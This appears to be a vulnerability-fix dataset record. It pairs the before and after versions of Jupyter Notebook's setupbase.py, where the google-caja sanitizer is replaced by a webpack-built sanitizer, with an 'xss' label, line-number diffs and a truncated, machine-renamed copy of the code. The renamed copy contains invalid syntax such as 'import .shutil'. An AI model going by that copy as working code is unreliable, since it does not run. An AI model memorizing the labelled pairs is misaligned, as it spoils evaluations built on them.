# so that installation will fail if they are missing
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
static_data.append(pjoin('static', app, 'js', 'main.min.js'))
components = pjoin("static", "components")
# select the components we actually need to install
# (there are lots of resources we bundle for sdist-reasons that we don't actually use)
static_data.extend([
pjoin(components, "backbone", "backbone-min.js"),
pjoin(components, "bootstrap", "dist", "js", "bootstrap.min.js"),
pjoin(components, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
pjoin(components, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
pjoin(components, "create-react-class", "index.js"),
pjoin(components, "font-awesome", "css", "*.css"),
pjoin(components, "es6-promise", "*.js"),
pjoin(components, "font-awesome", "fonts", "*.*"),
pjoin(components, "google-caja", "html-css-sanitizer-minified.js"),
pjoin(components, "jed", "jed.js"),
pjoin(components, "jquery", "jquery.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
pjoin(components, "jquery-ui", "jquery-ui.min.js"),
pjoin(components, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
pjoin(components, "jquery-ui", "themes", "smoothness", "images", "*"),
pjoin(components, "marked", "lib", "marked.js"),
pjoin(components, "react", "react.production.min.js"),
pjoin(components, "react", "react-dom.production.min.js"),
pjoin(components, "requirejs", "require.js"),
pjoin(components, "requirejs-plugins", "src", "json.js"),
pjoin(components, "requirejs-text", "text.js"),
pjoin(components, "underscore", "underscore-min.js"),
pjoin(components, "moment", "moment.js"),
pjoin(components, "moment", "min", "*.js"),
pjoin(components, "xterm.js", "index.js"),
pjoin(components, "xterm.js-css", "index.css"),
pjoin(components, "xterm.js-fit", "index.js"),
pjoin(components, "text-encoding", "lib", "encoding.js"),
])
# Ship all of Codemirror's CSS and JS
for parent, dirs, files in os.walk(pjoin(components, 'codemirror')):
for f in files:
if f.endswith(('.js', '.css')):
static_data.append(pjoin(parent, f))
# Trim mathjax
mj = lambda *path: pjoin(components, 'MathJax', *path)
static_data.extend([
mj('MathJax.js'),
mj('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
mj('config', 'Safe.js'),
])
trees = []
mj_out = mj('jax', 'output')
if os.path.exists(mj_out):
for output in os.listdir(mj_out):
path = pjoin(mj_out, output)
static_data.append(pjoin(path, '*.js'))
autoload = pjoin(path, 'autoload')
if os.path.isdir(autoload):
trees.append(autoload)
for tree in trees + [
mj('localization'), # limit to en?
mj('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
mj('extensions'),
mj('jax', 'input', 'TeX'),
mj('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
mj('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
mj('jax', 'element', 'mml'),
]:
for parent, dirs, files in os.walk(tree):
for f in files:
static_data.append(pjoin(parent, f))
os.chdir(os.path.join('tests',))
js_tests = glob('*.js') + glob('*/*.js')
os.chdir(cwd)
package_data = {
'notebook' : ['templates/*'] + static_data,
'notebook.tests' : js_tests,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return package_data
def check_package_data(package_data):
"""verify that package_data globs make sense"""
print("checking package data")
for pkg, data in package_data.items():
pkg_root = pjoin(*pkg.split('.'))
for d in data:
path = pjoin(pkg_root, d)
if '*' in path:
assert len(glob(path)) > 0, "No files match pattern %s" % path
else:
assert os.path.exists(path), "Missing package data: %s" % path
def check_package_data_first(command):
"""decorator for checking package_data before running a given command
Probably only needs to wrap build_py
"""
class DecoratedCommand(command):
def run(self):
check_package_data(self.package_data)
command.run(self)
return DecoratedCommand
def update_package_data(distribution):
"""update package_data to catch changes during setup"""
build_py = distribution.get_command_obj('build_py')
distribution.package_data = find_package_data()
# re-init build_py options which load package_data
build_py.finalize_options()
#---------------------------------------------------------------------------
# Notebook related
#---------------------------------------------------------------------------
try:
from shutil import which
except ImportError:
## which() function copied from Python 3.4.3; PSF license
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
static = pjoin(repo_root, 'notebook', 'static')
npm_path = os.pathsep.join([
pjoin(repo_root, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def mtime(path):
"""shorthand for mtime"""
return os.stat(path).st_mtime
def run(cmd, *args, **kwargs):
"""Echo a command before running it"""
log.info('> ' + list2cmdline(cmd))
kwargs['shell'] = (sys.platform == 'win32')
return check_call(cmd, *args, **kwargs)
class CompileBackendTranslation(Command):
description = "compile the .po files into .mo files, that contain the translations."
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
paths = glob('notebook/i18n/??_??')
for p in paths:
LANG = p[-5:]
for component in ['notebook', 'nbui']:
run(['pybabel', 'compile',
'-D', component,
'-f',
'-l', LANG,
'-i', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.po'),
'-o', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.mo')
])
class Bower(Command):
description = "fetch static client-side components with bower"
user_options = [
('force', 'f', "force fetching of bower dependencies"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
bower_dir = pjoin(static, 'components')
node_modules = pjoin(repo_root, 'node_modules')
def should_run(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
return mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))
def should_run_npm(self):
if not which('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return mtime(self.node_modules) < mtime(pjoin(repo_root, 'package.json'))
def run(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
run(['npm', 'install'], cwd=repo_root)
os.utime(self.node_modules, None)
env = os.environ.copy()
env['PATH'] = npm_path
try:
run(
['bower', 'install', '--allow-root', '--config.interactive=false'],
cwd=repo_root,
env=env
)
except OSError as e:
print("Failed to run bower: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# self.npm_components()
os.utime(self.bower_dir, None)
# update package data in case this created new files
update_package_data(self.distribution)
def patch_out_bootstrap_bw_print():
"""Hack! Manually patch out the bootstrap rule that forces printing in B&W.
We haven't found a way to override this rule with another one.
"""
print_less = pjoin(static, 'components', 'bootstrap', 'less', 'print.less')
with open(print_less) as f:
lines = f.readlines()
for ix, line in enumerate(lines):
if 'Black prints faster' in line:
break
else:
return # Already patched out, nothing to do.
rmed = lines.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", rmed)
print()
with open(print_less, 'w') as f:
f.writelines(lines)
class CompileCSS(Command):
"""Recompile Notebook CSS
Regenerate the compiled CSS from LESS sources.
Requires various dev dependencies, such as require and lessc.
"""
description = "Recompile Notebook CSS"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
sources = []
targets = []
for name in ('ipython', 'style'):
sources.append(pjoin(static, 'style', '%s.less' % name))
targets.append(pjoin(static, 'style', '%s.min.css' % name))
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
patch_out_bootstrap_bw_print()
for src, dst in zip(self.sources, self.targets):
try:
run(['lessc',
'--source-map',
'--include-path=%s' % pipes.quote(static),
src,
dst,
], cwd=repo_root, env=env)
except OSError as e:
print("Failed to build css: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# update package data in case this created new files
update_package_data(self.distribution)
class CompileJS(Command):
"""Rebuild Notebook Javascript main.min.js files and translation files.
Calls require via build-main.js
"""
description = "Rebuild Notebook Javascript main.min.js files"
user_options = [
('force', 'f', "force rebuilding js targets"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
apps = ['notebook', 'tree', 'edit', 'terminal', 'auth']
targets = [ pjoin(static, app, 'js', 'main.min.js') for app in apps ]
def sources(self, name):
"""Generator yielding .js sources that an application depends on"""
yield pjoin(repo_root, 'tools', 'build-main.js')
yield pjoin(static, name, 'js', 'main.js')
for sec in [name, 'base', 'auth']:
for f in glob(pjoin(static, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield pjoin(static, 'services', 'config.js')
if name == 'notebook':
for f in glob(pjoin(static, 'services', '*', '*.js')):
yield f
for parent, dirs, files in os.walk(pjoin(static, 'components')):
if os.path.basename(parent) == 'MathJax':
# don't look in MathJax, since it takes forever to walk it
dirs[:] = []
continue
for f in files:
yield pjoin(parent, f)
def should_run(self, name, target):
if self.force or not os.path.exists(target):
return True
target_mtime = mtime(target)
for source in self.sources(name):
if mtime(source) > target_mtime:
print(source, target)
return True
return False
def build_main(self, name):
"""Build main.min.js"""
target = pjoin(static, name, 'js', 'main.min.js')
if not self.should_run(name, target):
log.info("%s up to date" % target)
return
log.info("Rebuilding %s" % target)
run(['node', 'tools/build-main.js', name])
def build_jstranslation(self, trd):
lang = trd[-5:]
run([
pjoin('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.po'),
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.json'),
])
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
pool = ThreadPool()
pool.map(self.build_main, self.apps)
pool.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
# update package data in case this created new files
update_package_data(self.distribution)
class JavascriptVersion(Command):
"""write the javascript version to notebook javascript"""
description = "Write Jupyter version to javascript"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
nsfile = pjoin(repo_root, "notebook", "static", "base", "js", "namespace.js")
with open(nsfile) as f:
lines = f.readlines()
with open(nsfile, 'w') as f:
found = False
for line in lines:
if line.strip().startswith("Jupyter.version"):
line = ' Jupyter.version = "{0}";\n'.format(version)
found = True
f.write(line)
if not found:
raise RuntimeError("Didn't find Jupyter.version line in %s" % nsfile)
def css_js_prerelease(command, strict=False):
"""decorator for building minified js/css prior to another command"""
class DecoratedCommand(command):
def run(self):
self.distribution.run_command('jsversion')
jsdeps = self.distribution.get_command_obj('jsdeps')
js = self.distribution.get_command_obj('js')
css = self.distribution.get_command_obj('css')
jsdeps.force = js.force = strict
targets = [ jsdeps.bower_dir ]
targets.extend(js.targets)
targets.extend(css.targets)
missing = [ t for t in targets if not os.path.exists(t) ]
if not is_repo and not missing:
# If we're an sdist, we aren't a repo and everything should be present.
# Don't rebuild js/css in that case.
command.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
# refresh missing
missing = [ t for t in targets if not os.path.exists(t) ]
if strict or missing:
# die if strict or any targets didn't build
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
log.warn("rebuilding js and css failed. The following required files are missing: %s" % missing)
raise e
else:
log.warn("rebuilding js and css failed (not a problem)")
log.warn(str(e))
# check again for missing targets, just in case:
missing = [ t for t in targets if not os.path.exists(t) ]
if missing:
# command succeeded, but targets still missing (?!)
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
raise ValueError("The following required files are missing: %s" % missing)
command.run(self)
return DecoratedCommand
| """
This module defines the things that are used in setup.py for building the notebook
This includes:
* Functions for finding things like packages, package data, etc.
* A function for checking dependencies.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import re
import pipes
import shutil
import sys
from distutils import log
from distutils.cmd import Command
from fnmatch import fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import list2cmdline
else:
def list2cmdline(cmd_list):
return ' '.join(map(pipes.quote, cmd_list))
#-------------------------------------------------------------------------------
# Useful globals and utility functions
#-------------------------------------------------------------------------------
# A few handy globals
isfile = os.path.isfile
pjoin = os.path.join
repo_root = os.path.dirname(os.path.abspath(__file__))
is_repo = os.path.isdir(pjoin(repo_root, '.git'))
def oscmd(s):
print(">", s)
os.system(s)
# Py3 compatibility hacks, without assuming IPython itself is installed with
# the full py3compat machinery.
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
#---------------------------------------------------------------------------
# Basic project information
#---------------------------------------------------------------------------
name = 'notebook'
# release.py contains version, authors, license, url, keywords, etc.
version_ns = {}
execfile(pjoin(repo_root, name, '_version.py'), version_ns)
version = version_ns['__version__']
# vendored from pep440 package, we allow `.dev` suffix without trailing number.
loose_pep440re = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not loose_pep440re.match(version):
raise ValueError('Invalid version number `%s`, please follow pep440 convention or pip will get confused about which package is more recent.' % version)
#---------------------------------------------------------------------------
# Find packages
#---------------------------------------------------------------------------
def find_packages():
"""
Find all of the packages.
"""
packages = []
for dir,subdirs,files in os.walk(name):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
#---------------------------------------------------------------------------
# Find package data
#---------------------------------------------------------------------------
def find_package_data():
"""
Find package_data.
"""
# This is not enough for these things to appear in a sdist.
# We need to muck with the MANIFEST to get this to work
# exclude components and less from the walk;
# we will build the components separately
excludes = [
pjoin('static', 'components'),
pjoin('static', '*', 'less'),
pjoin('static', '*', 'node_modules')
]
# walk notebook resources:
cwd = os.getcwd()
os.chdir('notebook')
static_data = []
for parent, dirs, files in os.walk('static'):
if any(fnmatch(parent, pat) for pat in excludes):
# prevent descending into subdirs
dirs[:] = []
continue
for f in files:
static_data.append(pjoin(parent, f))
# for verification purposes, explicitly add main.min.js
# so that installation will fail if they are missing
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
static_data.append(pjoin('static', app, 'js', 'main.min.js'))
components = pjoin("static", "components")
# select the components we actually need to install
# (there are lots of resources we bundle for sdist-reasons that we don't actually use)
static_data.extend([
pjoin(components, "backbone", "backbone-min.js"),
pjoin(components, "bootstrap", "dist", "js", "bootstrap.min.js"),
pjoin(components, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
pjoin(components, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
pjoin(components, "create-react-class", "index.js"),
pjoin(components, "font-awesome", "css", "*.css"),
pjoin(components, "es6-promise", "*.js"),
pjoin(components, "font-awesome", "fonts", "*.*"),
pjoin(components, "jed", "jed.js"),
pjoin(components, "jquery", "jquery.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
pjoin(components, "jquery-ui", "jquery-ui.min.js"),
pjoin(components, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
pjoin(components, "jquery-ui", "themes", "smoothness", "images", "*"),
pjoin(components, "marked", "lib", "marked.js"),
pjoin(components, "react", "react.production.min.js"),
pjoin(components, "react", "react-dom.production.min.js"),
pjoin(components, "requirejs", "require.js"),
pjoin(components, "requirejs-plugins", "src", "json.js"),
pjoin(components, "requirejs-text", "text.js"),
pjoin(components, "sanitizer", "index.js"),
pjoin(components, "underscore", "underscore-min.js"),
pjoin(components, "moment", "moment.js"),
pjoin(components, "moment", "min", "*.js"),
pjoin(components, "xterm.js", "index.js"),
pjoin(components, "xterm.js-css", "index.css"),
pjoin(components, "xterm.js-fit", "index.js"),
pjoin(components, "text-encoding", "lib", "encoding.js"),
])
# Ship all of Codemirror's CSS and JS
for parent, dirs, files in os.walk(pjoin(components, 'codemirror')):
for f in files:
if f.endswith(('.js', '.css')):
static_data.append(pjoin(parent, f))
# Trim mathjax
mj = lambda *path: pjoin(components, 'MathJax', *path)
static_data.extend([
mj('MathJax.js'),
mj('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
mj('config', 'Safe.js'),
])
trees = []
mj_out = mj('jax', 'output')
if os.path.exists(mj_out):
for output in os.listdir(mj_out):
path = pjoin(mj_out, output)
static_data.append(pjoin(path, '*.js'))
autoload = pjoin(path, 'autoload')
if os.path.isdir(autoload):
trees.append(autoload)
for tree in trees + [
mj('localization'), # limit to en?
mj('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
mj('extensions'),
mj('jax', 'input', 'TeX'),
mj('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
mj('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
mj('jax', 'element', 'mml'),
]:
for parent, dirs, files in os.walk(tree):
for f in files:
static_data.append(pjoin(parent, f))
os.chdir(os.path.join('tests',))
js_tests = glob('*.js') + glob('*/*.js')
os.chdir(cwd)
package_data = {
'notebook' : ['templates/*'] + static_data,
'notebook.tests' : js_tests,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return package_data
def check_package_data(package_data):
"""verify that package_data globs make sense"""
print("checking package data")
for pkg, data in package_data.items():
pkg_root = pjoin(*pkg.split('.'))
for d in data:
path = pjoin(pkg_root, d)
if '*' in path:
assert len(glob(path)) > 0, "No files match pattern %s" % path
else:
assert os.path.exists(path), "Missing package data: %s" % path
def check_package_data_first(command):
"""decorator for checking package_data before running a given command
Probably only needs to wrap build_py
"""
class DecoratedCommand(command):
def run(self):
check_package_data(self.package_data)
command.run(self)
return DecoratedCommand
def update_package_data(distribution):
"""update package_data to catch changes during setup"""
build_py = distribution.get_command_obj('build_py')
distribution.package_data = find_package_data()
# re-init build_py options which load package_data
build_py.finalize_options()
#---------------------------------------------------------------------------
# Notebook related
#---------------------------------------------------------------------------
try:
from shutil import which
except ImportError:
## which() function copied from Python 3.4.3; PSF license
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
static = pjoin(repo_root, 'notebook', 'static')
npm_path = os.pathsep.join([
pjoin(repo_root, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def mtime(path):
"""shorthand for mtime"""
return os.stat(path).st_mtime
def run(cmd, *args, **kwargs):
"""Echo a command before running it"""
log.info('> ' + list2cmdline(cmd))
kwargs['shell'] = (sys.platform == 'win32')
return check_call(cmd, *args, **kwargs)
class CompileBackendTranslation(Command):
description = "compile the .po files into .mo files, that contain the translations."
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
paths = glob('notebook/i18n/??_??')
for p in paths:
LANG = p[-5:]
for component in ['notebook', 'nbui']:
run(['pybabel', 'compile',
'-D', component,
'-f',
'-l', LANG,
'-i', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.po'),
'-o', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.mo')
])
class Bower(Command):
description = "fetch static client-side components with bower"
user_options = [
('force', 'f', "force fetching of bower dependencies"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
bower_dir = pjoin(static, 'components')
node_modules = pjoin(repo_root, 'node_modules')
sanitizer_dir = pjoin(bower_dir, 'sanitizer')
def should_run(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
if not os.path.exists(self.sanitizer_dir):
return True
bower_stale = mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))
if bower_stale:
return True
return mtime(self.sanitizer_dir) < mtime(pjoin(repo_root, 'webpack.config.js'))
def should_run_npm(self):
if not which('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return mtime(self.node_modules) < mtime(pjoin(repo_root, 'package.json'))
def run(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
run(['npm', 'install'], cwd=repo_root)
os.utime(self.node_modules, None)
env = os.environ.copy()
env['PATH'] = npm_path
try:
run(
['bower', 'install', '--allow-root', '--config.interactive=false'],
cwd=repo_root,
env=env
)
except OSError as e:
print("Failed to run bower: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# self.npm_components()
if not os.path.exists(self.sanitizer_dir):
run(['npm', 'run', 'build:webpack'], cwd=repo_root, env=env)
os.utime(self.bower_dir, None)
# update package data in case this created new files
update_package_data(self.distribution)
def patch_out_bootstrap_bw_print():
"""Hack! Manually patch out the bootstrap rule that forces printing in B&W.
We haven't found a way to override this rule with another one.
"""
print_less = pjoin(static, 'components', 'bootstrap', 'less', 'print.less')
with open(print_less) as f:
lines = f.readlines()
for ix, line in enumerate(lines):
if 'Black prints faster' in line:
break
else:
return # Already patched out, nothing to do.
rmed = lines.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", rmed)
print()
with open(print_less, 'w') as f:
f.writelines(lines)
class CompileCSS(Command):
"""Recompile Notebook CSS
Regenerate the compiled CSS from LESS sources.
Requires various dev dependencies, such as require and lessc.
"""
description = "Recompile Notebook CSS"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
sources = []
targets = []
for name in ('ipython', 'style'):
sources.append(pjoin(static, 'style', '%s.less' % name))
targets.append(pjoin(static, 'style', '%s.min.css' % name))
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
patch_out_bootstrap_bw_print()
for src, dst in zip(self.sources, self.targets):
try:
run(['lessc',
'--source-map',
'--include-path=%s' % pipes.quote(static),
src,
dst,
], cwd=repo_root, env=env)
except OSError as e:
print("Failed to build css: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# update package data in case this created new files
update_package_data(self.distribution)
class CompileJS(Command):
"""Rebuild Notebook Javascript main.min.js files and translation files.
Calls require via build-main.js
"""
description = "Rebuild Notebook Javascript main.min.js files"
user_options = [
('force', 'f', "force rebuilding js targets"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
apps = ['notebook', 'tree', 'edit', 'terminal', 'auth']
targets = [ pjoin(static, app, 'js', 'main.min.js') for app in apps ]
def sources(self, name):
"""Generator yielding .js sources that an application depends on"""
yield pjoin(repo_root, 'tools', 'build-main.js')
yield pjoin(static, name, 'js', 'main.js')
for sec in [name, 'base', 'auth']:
for f in glob(pjoin(static, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield pjoin(static, 'services', 'config.js')
if name == 'notebook':
for f in glob(pjoin(static, 'services', '*', '*.js')):
yield f
for parent, dirs, files in os.walk(pjoin(static, 'components')):
if os.path.basename(parent) == 'MathJax':
# don't look in MathJax, since it takes forever to walk it
dirs[:] = []
continue
for f in files:
yield pjoin(parent, f)
def should_run(self, name, target):
if self.force or not os.path.exists(target):
return True
target_mtime = mtime(target)
for source in self.sources(name):
if mtime(source) > target_mtime:
print(source, target)
return True
return False
def build_main(self, name):
"""Build main.min.js"""
target = pjoin(static, name, 'js', 'main.min.js')
if not self.should_run(name, target):
log.info("%s up to date" % target)
return
log.info("Rebuilding %s" % target)
run(['node', 'tools/build-main.js', name])
def build_jstranslation(self, trd):
lang = trd[-5:]
run([
pjoin('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.po'),
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.json'),
])
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
pool = ThreadPool()
pool.map(self.build_main, self.apps)
pool.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
# update package data in case this created new files
update_package_data(self.distribution)
class JavascriptVersion(Command):
"""write the javascript version to notebook javascript"""
description = "Write Jupyter version to javascript"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
nsfile = pjoin(repo_root, "notebook", "static", "base", "js", "namespace.js")
with open(nsfile) as f:
lines = f.readlines()
with open(nsfile, 'w') as f:
found = False
for line in lines:
if line.strip().startswith("Jupyter.version"):
line = ' Jupyter.version = "{0}";\n'.format(version)
found = True
f.write(line)
if not found:
raise RuntimeError("Didn't find Jupyter.version line in %s" % nsfile)
def css_js_prerelease(command, strict=False):
"""decorator for building minified js/css prior to another command"""
class DecoratedCommand(command):
def run(self):
self.distribution.run_command('jsversion')
jsdeps = self.distribution.get_command_obj('jsdeps')
js = self.distribution.get_command_obj('js')
css = self.distribution.get_command_obj('css')
jsdeps.force = js.force = strict
targets = [ jsdeps.bower_dir ]
targets.extend(js.targets)
targets.extend(css.targets)
missing = [ t for t in targets if not os.path.exists(t) ]
if not is_repo and not missing:
# If we're an sdist, we aren't a repo and everything should be present.
# Don't rebuild js/css in that case.
command.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
# refresh missing
missing = [ t for t in targets if not os.path.exists(t) ]
if strict or missing:
# die if strict or any targets didn't build
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
log.warn("rebuilding js and css failed. The following required files are missing: %s" % missing)
raise e
else:
log.warn("rebuilding js and css failed (not a problem)")
log.warn(str(e))
# check again for missing targets, just in case:
missing = [ t for t in targets if not os.path.exists(t) ]
if missing:
# command succeeded, but targets still missing (?!)
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
raise ValueError("The following required files are missing: %s" % missing)
command.run(self)
return DecoratedCommand
| xss | {
"code": [
" pjoin(components, \"google-caja\", \"html-css-sanitizer-minified.js\"),",
" return mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))"
],
"line_no": [
140,
384
]
} | {
"code": [
" pjoin(components, \"sanitizer\", \"index.js\"),",
" if not os.path.exists(self.sanitizer_dir):",
" bower_stale = mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))",
" if bower_stale:",
" return True",
" return mtime(self.sanitizer_dir) < mtime(pjoin(repo_root, 'webpack.config.js'))",
" run(['npm', 'run', 'build:webpack'], cwd=repo_root, env=env)"
],
"line_no": [
153,
384,
387,
388,
389,
391,
426
]
} |
import os
import re
import pipes
import .shutil
import .sys
from distutils import log
from distutils.cmd import Command
from fnmatch import .fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import .list2cmdline
else:
def FUNC_10(VAR_19):
return ' '.join(map(pipes.quote, VAR_19))
VAR_0 = os.path.isfile
VAR_1 = os.path.join
VAR_2 = os.path.dirname(os.path.abspath(__file__))
VAR_3 = os.path.isdir(VAR_1(VAR_2, '.git'))
def FUNC_0(VAR_4):
print(">", VAR_4)
os.system(VAR_4)
try:
FUNC_18
except NameError:
